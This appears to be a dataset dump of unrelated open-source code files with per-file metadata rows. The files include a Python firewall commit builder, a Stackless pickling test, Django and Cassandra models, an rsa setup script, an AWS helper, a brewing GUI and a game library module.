merge = 'yes'
else:
merge = 'no'
s += merge_xml % merge
if self._vsys:
s += '<vsys>%s</vsys>' % self._vsys.pop()
s += '</shared-policy></commit-all>'
self._log(DEBUG1, 'commit-all cmd: %s', s)
return s
def __commit(self):
s = '<commit>'
if self._validate:
s += '<validate>'
if self._force:
s += '<force>'
if self.partial:
s += '<partial>'
for part in self.partial:
if part in _part_xml:
if part == 'vsys':
s += '<vsys>'
for name in self._vsys:
xml_vsys = _part_xml[part] % name
s += xml_vsys
s += '</vsys>'
else:
s += _part_xml[part]
if self.partial:
s += '</partial>'
if self._force:
s += '</force>'
if self._validate:
s += '</validate>'
s += '</commit>'
self._log(DEBUG1, 'commit cmd: %s', s)
return s
if __name__ == '__main__':
import pan.commit
c = pan.commit.PanCommit()
c.force()
c.device_and_network_excluded()
c.policy_and_objects_excluded()
c.shared_object_excluded()
c.vsys(['vsys4', 'vsys5'])
print('cmd:', c.cmd())
| isc | -1,830,847,370,469,896,400 | 25.957447 | 77 | 0.555051 | false | 3.807663 | false | false | false |
newerthcom/savagerebirth | libs/python-2.72/Stackless/test/test_pickle.py | 1 | 1069 | import sys, cPickle, pickle
from stackless import *
def run_pickled(func, *args):
t = tasklet(func)(*args)
print "starting tasklet"
t.run()
print "pickling"
# hack for pickle
if pickl == pickle:
t.tempval = None
pi = pickl.dumps(t)
t.remove()
#print pi
file("temp.pickle", "wb").write(pi)
print "unpickling"
ip = pickl.loads(pi)
print "starting unpickled tasklet"
ip.run()
def test(n, when):
for i in range(n):
if i==when:
schedule()
print i
def rectest(nrec, lev=0):
print lev*" " + "entering", lev+1
if lev < nrec:
rectest(nrec, lev+1)
else:
schedule()
print lev*" " + "leaving", lev+1
pickl = pickle # note that the refcounts are correct with pickle.py
# but also note that in 2.2, pickle seems broken for extension types
# which are referencing themselves...
print
print "testing pickled iteration"
print 60*"-"
print
run_pickled(test, 20, 13)
print
print "testing pickled recursion"
print 60*"-"
print
run_pickled(rectest, 13)
| gpl-2.0 | 5,018,692,409,707,227,000 | 19.557692 | 68 | 0.623012 | false | 3.239394 | true | false | false |
Orpheus11/nile | nile/db/models.py | 1 | 4339 | from nile.common import log as logging
from nile.common import exception
from nile.common.i18n import _
from nile.common import models
from nile.common import pagination
from nile.common import utils
from nile.db import db_query
from nile.db import get_db_api
LOG = logging.getLogger(__name__)
class DatabaseModelBase(models.ModelBase):
_auto_generated_attrs = ['id']
@classmethod
def create(cls, **values):
now_time = utils.utcnow()
init_vals = {
'id': utils.generate_uuid(),
'created': now_time,
}
if hasattr(cls, 'deleted'):
init_vals['deleted'] = False
if hasattr(cls, 'updated'):
init_vals['updated'] = now_time
init_vals.update(values)
instance = cls(**init_vals)
if not instance.is_valid():
raise exception.InvalidModelError(errors=instance.errors)
return instance.save()
@property
def db_api(self):
return get_db_api()
@property
def preserve_on_delete(self):
return hasattr(self, 'deleted') and hasattr(self, 'deleted_at')
@classmethod
def query(cls):
return get_db_api()._base_query(cls)
def save(self):
if not self.is_valid():
raise exception.InvalidModelError(errors=self.errors)
self['updated'] = utils.utcnow()
LOG.debug("Saving %(name)s: %(dict)s" %
{'name': self.__class__.__name__, 'dict': self.__dict__})
return self.db_api.save(self)
def delete(self):
self['updated'] = utils.utcnow()
LOG.debug("Deleting %(name)s: %(dict)s" %
{'name': self.__class__.__name__, 'dict': self.__dict__})
if self.preserve_on_delete:
self['deleted_at'] = utils.utcnow()
self['deleted'] = True
return self.db_api.save(self)
else:
return self.db_api.delete(self)
def update(self, **values):
for key in values:
if hasattr(self, key):
setattr(self, key, values[key])
self['updated'] = utils.utcnow()
return self.db_api.save(self)
def __init__(self, **kwargs):
self.merge_attributes(kwargs)
if not self.is_valid():
raise exception.InvalidModelError(errors=self.errors)
def merge_attributes(self, values):
"""dict.update() behaviour."""
for k, v in values.iteritems():
self[k] = v
@classmethod
def find_by(cls, context=None, **conditions):
model = cls.get_by(**conditions)
if model is None:
raise exception.ModelNotFoundError(_("%(s_name)s Not Found") %
{"s_name": cls.__name__})
if ((context and not context.is_admin and hasattr(model, 'user_id')
and model.user_id != context.user_id)):
msg = _("User %(s_user_id)s tried to access "
"%(s_name)s, owned by %(s_owner)s.")
LOG.error(msg % (
{"s_user_id": context.user_id, "s_name": cls.__name__,
"s_owner": model.user_id}))
raise exception.ModelNotFoundError(
_("User %(s_user_id)s cannot access %(s_name)s") % (
{"s_user_id": context.user_id, "s_name": cls.__name__}))
return model
@classmethod
def get_by(cls, **kwargs):
return get_db_api().find_by(cls, **cls._process_conditions(kwargs))
@classmethod
def find_all(cls, **kwargs):
return db_query.find_all(cls, **cls._process_conditions(kwargs))
@classmethod
def _process_conditions(cls, raw_conditions):
"""Override in inheritors to format/modify any conditions."""
return raw_conditions
@classmethod
def find_by_pagination(cls, collection_type, collection_query, order_by=None, page_size=200, page_index=0):
elements, count = collection_query.paginated_collection(order_by=order_by, page_size=page_size, page_index=page_index)
return pagination.PaginatedDataView(collection_type,
elements,
page_index=page_index,
page_size=page_size,
total_size=count)
| apache-2.0 | -7,782,729,962,570,167,000 | 34.276423 | 126 | 0.555428 | false | 3.962557 | false | false | false |
jayceyxc/hue | desktop/core/ext-py/rsa-3.4.2/setup.py | 9 | 2511 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2011 Sybren A. Stüvel <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup
if __name__ == '__main__':
setup(name='rsa',
version='3.4.2',
description='Pure-Python RSA implementation',
author='Sybren A. Stuvel',
author_email='[email protected]',
maintainer='Sybren A. Stuvel',
maintainer_email='[email protected]',
url='https://stuvel.eu/rsa',
packages=['rsa'],
license='ASL 2',
classifiers=[
'Development Status :: 5 - Production/Stable',
'Intended Audience :: Developers',
'Intended Audience :: Education',
'Intended Audience :: Information Technology',
'License :: OSI Approved :: Apache Software License',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Topic :: Security :: Cryptography',
],
install_requires=[
'pyasn1 >= 0.1.3',
],
entry_points={'console_scripts': [
'pyrsa-priv2pub = rsa.util:private_to_public',
'pyrsa-keygen = rsa.cli:keygen',
'pyrsa-encrypt = rsa.cli:encrypt',
'pyrsa-decrypt = rsa.cli:decrypt',
'pyrsa-sign = rsa.cli:sign',
'pyrsa-verify = rsa.cli:verify',
'pyrsa-encrypt-bigfile = rsa.cli:encrypt_bigfile',
'pyrsa-decrypt-bigfile = rsa.cli:decrypt_bigfile',
]},
)
| apache-2.0 | 8,079,674,007,353,006,000 | 40.147541 | 75 | 0.568924 | false | 4.114754 | false | false | false |
CatalystOfNostalgia/hoot | server/hoot/aws_module.py | 1 | 1175 | import json, boto, boto.s3.connection, bottlenose, os.path, time
from boto.s3.key import Key
from urllib.error import HTTPError
# Load the AWS key information
f = open(os.path.dirname(os.path.realpath(__file__)) + "/keys/aws_keys.json")
configs = json.loads(f.read())
s3conn = boto.connect_s3(aws_access_key_id=configs["aws_public_key"],aws_secret_access_key=configs["aws_secret_key"])
bucket = s3conn.get_bucket("hootproject")
def error_handler(err):
ex = err['exception']
if isinstance(ex, HTTPError) and ex.code == 503:
time.sleep(random.expovariate(0.1))
return True
def setup_product_api():
return bottlenose.Amazon(configs["aws_public_key"],
configs["aws_secret_key"],
configs["product_api_tag"],
ErrorHandler=error_handler,
MaxQPS=0.9)
def push_to_S3(filename, jsonToUpload):
k = Key(bucket)
k.key = filename
k.set_contents_from_string(jsonToUpload)
def retrieve_from_S3(filename):
key = bucket.new_key(filename)
contents = key.get_contents_as_string().decode(encoding='UTF-8')
return contents
| mit | 3,316,388,972,341,448,000 | 34.606061 | 117 | 0.639149 | false | 3.357143 | true | false | false |
mburgess00/brew_controller | brew_gui.py | 1 | 2691 | #!/usr/bin/env python3
from guizero import App, Text, Slider, Combo, PushButton, Box, Picture
pause = True
def readsensors():
return {"hlt" : 160, "rims" : 152, "bk" : 75}
def handlepause():
global pause
global pauseState
print("Pause Button pressed")
if pause:
print("running")
pause = not pause
pauseState.value=("Running")
hltFlame.visible=True
rimsFlame.visible=True
bkFlame.visible=True
else:
print("pausing")
pause = not pause
pauseState.value=("Paused")
hltFlame.visible=False
rimsFlame.visible=False
bkFlame.visible=False
return
app = App(title="Brew GUI", width=1280, height=768, layout="grid")
vertPad = Picture(app, image="blank_vert.gif", grid=[0,0])
hltBox = Box(app, layout="grid", grid=[1,0])
hltPad = Picture(hltBox, image="blank.gif", grid=[0,0])
hltTitle = Text(hltBox, text="HLT", grid=[0,1], align="top")
hltText = Text(hltBox, text="180", grid=[0,2], align="top")
hltSlider = Slider(hltBox, start=212, end=100, horizontal=False, grid=[0,3], align="top")
hltSlider.tk.config(length=500, width=50)
hltFlamePad = Picture(hltBox, image="blank_flame.gif", grid=[0,4])
hltFlame = Picture(hltBox, image="flame.gif", grid=[0,4])
rimsBox = Box(app, layout="grid", grid=[2,0])
rimsPad = Picture(rimsBox, image="blank.gif", grid=[0,0])
rimsTitle = Text(rimsBox, text="RIMS", grid=[0,1], align="top")
rimsText = Text(rimsBox, text="180", grid=[0,2], align="top")
rimsSlider = Slider(rimsBox, start=212, end=100, horizontal=False, grid=[0,3], align="top")
rimsSlider.tk.config(length=500, width=50)
rimsFlamePad = Picture(rimsBox, image="blank_flame.gif", grid=[0,4])
rimsFlame = Picture(rimsBox, image="flame.gif", grid=[0,4])
bkBox = Box(app, layout="grid", grid=[3,0])
bkPad = Picture(bkBox, image="blank.gif", grid=[0,0])
bkTitle = Text(bkBox, text="BK", grid=[0,1], align="top")
bkText = Text(bkBox, text="75", grid=[0,2], align="top")
bkSlider = Slider(bkBox, start=100, end=0, horizontal=False, grid=[0,3], align="top")
bkSlider.tk.config(length=500, width=50)
bkFlamePad = Picture(bkBox, image="blank_flame.gif", grid=[0,4])
bkFlame = Picture(bkBox, image="flame.gif", grid=[0,4])
modeBox = Box(app, layout="grid", grid=[4,0])
modePad = Picture(modeBox, image="blank.gif", grid=[0,0])
modeTitle = Text(modeBox, text="Mode", grid=[0,0], align="top")
mode = Combo(modeBox, options=["HLT", "RIMS", "BK"], grid=[1,0])
pauseState = Text(modeBox, text="Paused", grid=[0,1])
pauseButton = PushButton(modeBox, icon="pause-play.gif", command=handlepause, grid=[1,1])
hltFlame.visible=False
rimsFlame.visible=False
bkFlame.visible=False
app.display()
| apache-2.0 | -2,969,034,358,908,253,000 | 37.442857 | 91 | 0.668525 | false | 2.737538 | false | false | false |
tbpmig/mig-website | bookswap/migrations/0002_faqitem_locationimage.py | 1 | 1308 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import stdimage.models
class Migration(migrations.Migration):
dependencies = [
('bookswap', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='FAQItem',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('title', models.TextField()),
('text', models.TextField()),
('display_order', models.PositiveSmallIntegerField()),
],
options={
},
bases=(models.Model,),
),
migrations.CreateModel(
name='LocationImage',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('photo', stdimage.models.StdImageField(upload_to=b'bookswap_photos')),
('super_caption', models.TextField(null=True, blank=True)),
('sub_caption', models.TextField()),
('display_order', models.PositiveSmallIntegerField()),
],
options={
},
bases=(models.Model,),
),
]
| apache-2.0 | 1,716,465,798,750,666,500 | 31.7 | 114 | 0.529052 | false | 4.791209 | false | false | false |
Jpadilla1/notaso | notaso/universities/models.py | 1 | 1258 | from django.db import models
from ..professors.models import Professor
def get_upload_file_name(intance, filename):
return "static/uploaded_files/%s" % (filename)
class University(models.Model):
name = models.CharField(max_length=50)
city = models.CharField(max_length=25)
emblem = models.FileField(upload_to=get_upload_file_name)
slug = models.SlugField(null=False)
def __unicode__(self):
return u'%s %s' % (self.name, self.city)
def save(self, *args, **kwargs):
self.slug = self.slug.lower()
super(University, self).save(*args, **kwargs)
def count(instance):
return Professor.objects.filter(university=instance).count()
def get_grade(instance):
professors = Professor.objects.filter(university=instance)
count = 0
percent = 0
for p in professors:
percent += p.get_percent()
count += 1
if count == 0:
percent = 0
else:
percent = percent/count
if percent >= 90:
return 'A'
elif percent >= 80:
return 'B'
elif percent >= 70:
return 'C'
elif percent >= 60:
return 'D'
else:
return 'F'
| mit | 2,519,322,818,903,721,500 | 25.208333 | 68 | 0.572337 | false | 3.755224 | false | false | false |
JoyTeam/metagam | mg/constructor/library.py | 1 | 23694 | #!/usr/bin/python2.6
# This file is a part of Metagam project.
#
# Metagam is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# any later version.
#
# Metagam is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Metagam. If not, see <http://www.gnu.org/licenses/>.
from mg.constructor import *
import re
re_double_slash = re.compile(r'//')
re_valid_code = re.compile(r'^[a-z0-9][a-z0-9\-_]*(\/[a-z0-9\-_]*[a-z0-9_])*$')
re_del = re.compile(r'^del\/(.+)$')
re_valid_pgcode = re.compile(r'u_[a-z0-9_]+$')
class DBLibraryPage(CassandraObject):
clsname = "LibraryPage"
indexes = {
"all": [[], "code"],
"code": [["code"]],
}
class DBLibraryPageList(CassandraObjectList):
objcls = DBLibraryPage
class DBLibraryGroup(CassandraObject):
clsname = "LibraryGroup"
indexes = {
"all": [[], "code"],
"code": [["code"]],
"everywhere": [["everywhere"]],
}
class DBLibraryGroupList(CassandraObjectList):
objcls = DBLibraryGroup
class DBLibraryPageGroup(CassandraObject):
clsname = "LibraryPageGroup"
indexes = {
"grp": [["grp"]],
"page": [["page"]],
}
class DBLibraryPageGroupList(CassandraObjectList):
objcls = DBLibraryPageGroup
class Library(ConstructorModule):
def register(self):
self.rhook("gameinterface.buttons", self.gameinterface_buttons)
self.rhook("ext-library.index", self.library_index, priv="public")
self.rhook("ext-library.handler", self.library_handler, priv="public")
self.rhook("socio.button-blocks", self.button_blocks)
self.rhook("sociointerface.buttons", self.buttons)
self.rhook("library-page-index.content", self.page_index)
self.rhook("hook-lib.catalog", self.hook_catalog)
self.rhook("library.page-groups", self.page_groups)
self.rhook("library.icon", self.icon)
self.rhook("admin-icons.list", self.icons_list)
def icons_list(self, icons):
icons.append({
"code": "library-icon",
"title": self._("Library icon"),
"default": "/st-mg/icons/library-icon.png",
})
def icon(self, uri):
img = self.call("icon.get", "library-icon", default_icon="/st-mg/icons/library-icon.png")
return ' <a href="%s" target="_blank"><img src="%s" alt="?" class="library-icon" /></a>' % (uri, img)
def button_blocks(self, blocks):
blocks.append({"id": "library", "title": self._("Library"), "class": "library"})
def child_modules(self):
return ["mg.constructor.library.LibraryAdmin"]
def gameinterface_buttons(self, buttons):
buttons.append({
"id": "library",
"href": "/library",
"target": "_blank",
"icon": "library.png",
"title": self._("Game library"),
"block": "top-menu",
"order": 8,
})
def library_index(self):
self.library_page("index")
def library_handler(self):
req = self.req()
self.library_page(req.args)
def library_page(self, code):
if not re_valid_code.match(code):
self.call("web.not_found")
lst = self.objlist(DBLibraryPageList, query_index="code", query_equal=code)
lst.load()
if len(lst):
pent = lst[0]
else:
pent = self.call("library-page-%s.content" % code, render_content=True)
if not pent:
self.call("web.not_found")
vars = {
"title": htmlescape(pent.get("title")),
"keywords": htmlescape(pent.get("keywords")),
"description": htmlescape(pent.get("description")),
"allow_bracket_hooks": True,
}
vars["library_content"] = self.call("web.parse_inline_layout", pent.get("content"), vars)
# loading blocks
blocks = {}
lst = self.objlist(DBLibraryGroupList, query_index="everywhere", query_equal="1")
lst.load()
for ent in lst:
blocks[ent.get("code")] = {
"code": ent.get("code"),
"content": ent.get("block_content"),
"order": ent.get("block_order"),
}
lst = self.objlist(DBLibraryPageGroupList, query_index="page", query_equal=code)
lst.load(silent=True)
for ent in lst:
if ent.get("grp") not in blocks:
grplst = self.objlist(DBLibraryGroupList, query_index="code", query_equal=ent.get("grp"))
grplst.load()
for grp in grplst:
if grp.get("block"):
blocks[grp.get("code")] = {
"code": grp.get("code"),
"content": grp.get("block_content"),
"order": grp.get("block_order"),
}
if len(blocks):
blocks = blocks.values()
blocks.sort(cmp=lambda x, y: cmp(x.get("order"), y.get("order")) or cmp(x.get("code"), y.get("code")))
vars["library_blocks"] = [self.call("web.parse_inline_layout", blk["content"], vars) for blk in blocks]
# loading parents
menu_left = [{"html": vars["title"], "lst": True}]
parent = pent.get("parent")
shown = set()
shown.add(pent.get("code"))
while parent and parent not in shown:
shown.add(parent)
lst = self.objlist(DBLibraryPageList, query_index="code", query_equal=parent)
lst.load()
if len(lst):
parent_ent = lst[0]
else:
parent_ent = self.call("library-page-%s.content" % parent, render_content=False)
if not parent_ent:
break
menu_left.insert(0, {"html": htmlescape(parent_ent.get("title")), "href": "/library" if parent == "index" else "/library/%s" % parent})
parent = parent_ent.get("parent")
if menu_left:
vars["menu_left"] = menu_left
self.call("socio.response_template", "library.html", vars)
def buttons(self, buttons):
buttons.append({
"id": "forum-library",
"href": "/library",
"title": self._("Library"),
"target": "_self",
"block": "forum",
"order": 10,
"left": True,
})
def page_index(self, render_content):
pageinfo = {
"title": self._("Library - %s") % self.app().project.get("title_short"),
}
if render_content:
pageinfo["content"] = '[hook:lib.catalog grp="index"]'
return pageinfo
def page_groups(self, page_groups):
page_groups.append({
"code": "index",
"title": self._("Publish on the library indexpage"),
})
lst = self.objlist(DBLibraryGroupList, query_index="all")
lst.load()
for ent in lst:
page_groups.append({
"code": ent.get("code"),
"title": ent.get("title"),
"uuid": ent.uuid,
"manual": True,
"everywhere": ent.get("everywhere"),
})
def hook_catalog(self, vars, grp, delim="<br />"):
lst = self.objlist(DBLibraryPageGroupList, query_index="grp", query_equal=grp)
lst.load(silent=True)
pages = []
for ent in lst:
pages.append({"page": ent.get("page"), "order": ent.get("order")})
self.call("library-grp-%s.pages" % grp, pages)
pages.sort(cmp=lambda x, y: cmp(x["order"], y["order"]) or cmp(x["page"], y["page"]))
page_info = {}
lst = self.objlist(DBLibraryPageList, query_index="code", query_equal=[ent["page"] for ent in pages])
lst.load(silent=True)
for ent in lst:
page_info[ent.get("code")] = ent
result = []
for ent in pages:
page = page_info.get(ent["page"]) or self.call("library-page-%s.content" % ent["page"], render_content=False)
if page:
code = page.get("code")
result.append('<a href="%s">%s</a>' % ("/library" if code == "index" else "/library/%s" % code, htmlescape(page.get("title"))))
return delim.join(result)
class LibraryAdmin(ConstructorModule):
def register(self):
self.rhook("menu-admin-root.index", self.menu_root_index)
self.rhook("menu-admin-library.index", self.menu_library_index)
self.rhook("permissions.list", self.permissions_list)
self.rhook("ext-admin-library.pages", self.admin_pages, priv="library.edit")
self.rhook("headmenu-admin-library.pages", self.headmenu_pages)
self.rhook("ext-admin-library.page-groups", self.admin_page_groups, priv="library.edit")
self.rhook("headmenu-admin-library.page-groups", self.headmenu_page_groups)
self.rhook("objclasses.list", self.objclasses_list)
self.rhook("advice-admin-library.index", self.advice_library)
self.rhook("admin-sociointerface.design-files", self.design_files)
def design_files(self, files):
files.append({"filename": "library.html", "description": self._("Library page layout"), "doc": "/doc/design/library"})
def advice_library(self, hook, args, advice):
advice.append({"title": self._("Library documentation"), "content": self._('You can find detailed information on the library system in the <a href="//www.%s/doc/library" target="_blank">library page</a> in the reference manual.') % self.main_host})
def objclasses_list(self, objclasses):
objclasses["LibraryPage"] = (DBLibraryPage, DBLibraryPageList)
objclasses["LibraryGroup"] = (DBLibraryGroup, DBLibraryGroupList)
objclasses["LibraryPageGroup"] = (DBLibraryPageGroup, DBLibraryPageGroupList)
def menu_root_index(self, menu):
menu.append({"id": "library.index", "text": self._("Library"), "order": 80})
def menu_library_index(self, menu):
req = self.req()
if req.has_access("library.edit"):
menu.append({"id": "library/page-groups", "text": self._("Library page groups"), "order": 5, "leaf": True})
menu.append({"id": "library/pages", "text": self._("Library pages"), "order": 10, "leaf": True})
def permissions_list(self, perms):
perms.append({"id": "library.edit", "name": self._("Library editing")})
def headmenu_pages(self, args):
if args == "new":
return [self._("New page"), "library/pages"]
elif args:
try:
page = self.obj(DBLibraryPage, args)
except ObjectNotFoundException:
pass
else:
return [htmlescape(page.get("title")), "library/pages"]
return self._("Library pages")
def admin_pages(self):
req = self.req()
m = re_del.match(req.args)
if m:
uuid = m.group(1)
try:
page = self.obj(DBLibraryPage, uuid)
except ObjectNotFoundException:
pass
else:
page.remove()
self.objlist(DBLibraryPageGroupList, query_index="page", query_equal=page.get("code")).remove()
self.call("admin.redirect", "library/pages")
if req.args:
if req.args != "new":
try:
page = self.obj(DBLibraryPage, req.args)
except ObjectNotFoundException:
self.call("admin.redirect", "library/pages")
else:
page = self.obj(DBLibraryPage)
page_groups = []
self.call("library.page-groups", page_groups)
page_groups = [pg for pg in page_groups if not pg.get("everywhere")]
if req.ok():
errors = {}
code = req.param("code").strip()
if not code:
errors["code"] = self._("This field is mandatory")
elif code.startswith('/'):
errors["code"] = self._("Code can't start with slash")
elif code.endswith('/'):
errors["code"] = self._("Code can't end with slash")
elif re_double_slash.search(code):
errors["code"] = self._("Code can't contain '//'")
elif not re_valid_code.match(code):
errors["code"] = self._("Invalid format")
else:
lst = self.objlist(DBLibraryPageList, query_index="code", query_equal=code)
if len(lst) and lst[0].uuid != page.uuid:
errors["code"] = self._("There is a page with the same code already")
else:
page.set("code", code)
title = req.param("title").strip()
if not title:
errors["title"] = self._("This field is mandatory")
else:
page.set("title", title)
content = req.param("content").strip()
page.set("content", content)
keywords = req.param("keywords").strip()
if not keywords:
errors["keywords"] = self._("This field is mandatory")
else:
page.set("keywords", keywords)
description = req.param("description").strip()
if not description:
errors["description"] = self._("This field is mandatory")
else:
page.set("description", description)
page.set("parent", req.param("parent").strip())
if len(errors):
self.call("web.response_json", {"success": False, "errors": errors})
page.store()
self.objlist(DBLibraryPageGroupList, query_index="page", query_equal=page.get("code")).remove()
for grp in page_groups:
order = req.param("grp-%s" % grp.get("code"))
if order != "":
obj = self.obj(DBLibraryPageGroup)
obj.set("page", page.get("code"))
obj.set("grp", grp.get("code"))
obj.set("order", intz(order))
obj.store()
self.call("admin.redirect", "library/pages")
fields = [
{"name": "code", "label": self._("Page code (latin letters, slashes, digits and '-'). This page code is practically a component of the page URL. This library page will be available as '/library/<code>'. You may use slashes. For example, 'clans/wars' will be available at '/library/clans/wars'. Special code 'index' means library index page: '/library'"), "value": page.get("code")},
{"name": "title", "label": self._("Page title"), "value": page.get("title")},
{"name": "parent", "label": self._("Code of the parent page"), "value": page.get("parent")},
{"name": "content", "type": "htmleditor", "label": self._("Page content. You may use hooks to include any dynamic content"), "value": page.get("content")},
{"name": "keywords", "label": self._("Page keywords (visible to search engines). Comma delimited"), "value": page.get("keywords")},
{"name": "description", "label": self._("Page decription (visible to search engines only)"), "value": page.get("description")},
]
lst = self.objlist(DBLibraryPageGroupList, query_index="page", query_equal=page.get("code"))
lst.load()
group_enabled = {}
for ent in lst:
group_enabled[ent.get("grp")] = ent.get("order")
fields.append({"type": "header", "html": self._("Which groups this page belongs to. If you want any page to show in the group specify an integer value here. This value will be the sorting order of the page in the group")})
col = 0
for grp in page_groups:
fields.append({"name": "grp-%s" % grp.get("code"), "label": htmlescape(grp.get("title")), "value": group_enabled.get(grp.get("code")), "inline": (col % 3 != 0)})
col += 1
while col % 3 != 0:
fields.append({"type": "empty", "inline": True})
col += 1
self.call("admin.form", fields=fields, modules=["HtmlEditorPlugins"])
rows = []
lst = self.objlist(DBLibraryPageList, query_index="all")
lst.load()
for ent in lst:
code = ent.get("code")
rows.append([
code,
'<hook:admin.link href="library/pages/%s" title="%s" />' % (ent.uuid, htmlescape(ent.get("title"))),
'<hook:admin.link href="library/pages/del/%s" title="%s" confirm="%s" />' % (ent.uuid, self._("delete"), self._("Are you sure want to delete this page?")),
'<a href="%s" target="_blank">%s</a>' % ("/library" if code == "index" else "/library/%s" % code, self._("view")),
])
vars = {
"tables": [
{
"links": [
{"hook": "library/pages/new", "text": self._("New library page"), "lst": True},
],
"header": [
self._("Page code"),
self._("Title"),
self._("Deletion"),
self._("Viewing"),
],
"rows": rows
}
]
}
self.call("admin.response_template", "admin/common/tables.html", vars)
def headmenu_page_groups(self, args):
if args == "new":
return [self._("New page group"), "library/page-groups"]
elif args:
try:
page_group = self.obj(DBLibraryGroup, args)
except ObjectNotFoundException:
pass
else:
return [htmlescape(page_group.get("title")), "library/page-groups"]
return self._("Library page groups")
def admin_page_groups(self):
req = self.req()
m = re_del.match(req.args)
if m:
uuid = m.group(1)
try:
page_group = self.obj(DBLibraryGroup, uuid)
except ObjectNotFoundException:
pass
else:
page_group.remove()
self.objlist(DBLibraryPageGroupList, query_index="grp", query_equal=page_group.get("code")).remove()
self.call("admin.redirect", "library/page-groups")
if req.args:
if req.args != "new":
try:
page_group = self.obj(DBLibraryGroup, req.args)
except ObjectNotFoundException:
self.call("admin.redirect", "library/page-groups")
else:
page_group = self.obj(DBLibraryGroup)
if req.ok():
errors = {}
code = req.param("code").strip()
if not code:
errors["code"] = self._("This field is mandatory")
elif not code.startswith("u_"):
errors["code"] = self._("Identifier must start with 'u_'")
elif not re_valid_pgcode.match(code):
errors["code"] = self._("Invalid format")
else:
lst = self.objlist(DBLibraryGroupList, query_index="code", query_equal=code)
if len(lst) and lst[0].uuid != page_group.uuid:
errors["code"] = self._("There is a page group with the same code already")
else:
page_group.set("code", code)
title = req.param("title").strip()
if not title:
errors["title"] = self._("This field is mandatory")
else:
page_group.set("title", title)
if req.param("block"):
page_group.set("block", 1)
page_group.set("block_order", intz(req.param("block_order")))
if req.param("block_everywhere"):
page_group.set("everywhere", 1)
else:
page_group.delkey("everywhere")
page_group.set("block_content", req.param("block_content"))
else:
page_group.delkey("block")
page_group.delkey("block_order")
page_group.delkey("block_everywhere")
page_group.delkey("block_content")
if len(errors):
self.call("web.response_json", {"success": False, "errors": errors})
page_group.store()
self.call("admin.redirect", "library/page-groups")
fields = [
{"name": "code", "label": self._("Page group code (must start with u_ and contain latin letters, digits and '_' symbols)"), "value": page_group.get("code")},
{"name": "title", "label": self._("Page group title"), "value": page_group.get("title")},
{"name": "block", "label": self._("This group is a block (HTML portion that will be shown on every page in the group)"), "type": "checkbox", "checked": page_group.get("block")},
{"name": "block_content", "type": "htmleditor", "label": self._("Block content. You may use hooks to include any dynamic content"), "value": page_group.get("block_content"), "condition": "[block]"},
{"name": "block_order", "label": self._("Block sorting order"), "value": page_group.get("block_order"), "condition": "[block]"},
{"name": "block_everywhere", "type": "checkbox", "label": self._("This block is shown on the every library page"), "checked": page_group.get("everywhere"), "condition": "[block]"},
]
self.call("admin.form", fields=fields, modules=["HtmlEditorPlugins"])
page_groups = []
self.call("library.page-groups", page_groups)
rows = []
for ent in page_groups:
code = ent.get("code")
manual = ent.get("manual")
title = htmlescape(ent.get("title"))
rows.append([
code,
'<hook:admin.link href="library/page-groups/%s" title="%s" />' % (ent.get("uuid"), title) if manual else title,
'<hook:admin.link href="library/page-groups/del/%s" title="%s" confirm="%s" />' % (ent.get("uuid"), self._("delete"), self._("Are you sure want to delete this page group?")) if manual else None,
])
vars = {
"tables": [
{
"links": [
{"hook": "library/page-groups/new", "text": self._("New library page group"), "lst": True},
],
"header": [
self._("Page group code"),
self._("Title"),
self._("Deletion"),
],
"rows": rows
}
]
}
self.call("admin.response_template", "admin/common/tables.html", vars)
| gpl-3.0 | 2,122,445,489,926,149,000 | 45.826087 | 404 | 0.525618 | false | 4.027537 | false | false | false |
nbstr/demineur | beautiful.py | 1 | 1191 | #=========================================#
# BEAUTIFUL #
#=========================================#
#=========================================#
# HEADER #
#=========================================#
def header(text="DÉMINEUR", vp=1, p=6, m=7, s="#", s2="="):
"""
Affiche un beau titre.
"""
padding = p*" "
margin = m*" "
void = margin + s + " "*(len(text) + 2*p) + s
print("\n" + margin + s + s2*(len(text) + 2*p) + s)
for i in range(vp):
print(void)
print(margin + s + padding + text + padding + s)
for i in range(vp):
print(void)
print(margin + s + s2*(len(text) + 2*p) + s + "\n")
#=========================================#
# INPUT INT #
#=========================================#
def input_int(txt="Veuillez entrer un nombre : ", error="!! Vous n'avez pas entré un nombre"):
"""
Retourne un int envoyé par l'utilisateur avec la gestion des exceptions
"""
while True:
try:
n = int(input(txt))
break
except ValueError:
print (error + "\n")
return n | unlicense | -3,643,178,339,065,126,400 | 26.651163 | 94 | 0.355219 | false | 3.689441 | false | false | false |
googleapis/python-dataproc-metastore | google/cloud/metastore_v1alpha/services/dataproc_metastore/client.py | 1 | 77386 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from collections import OrderedDict
from distutils import util
import os
import re
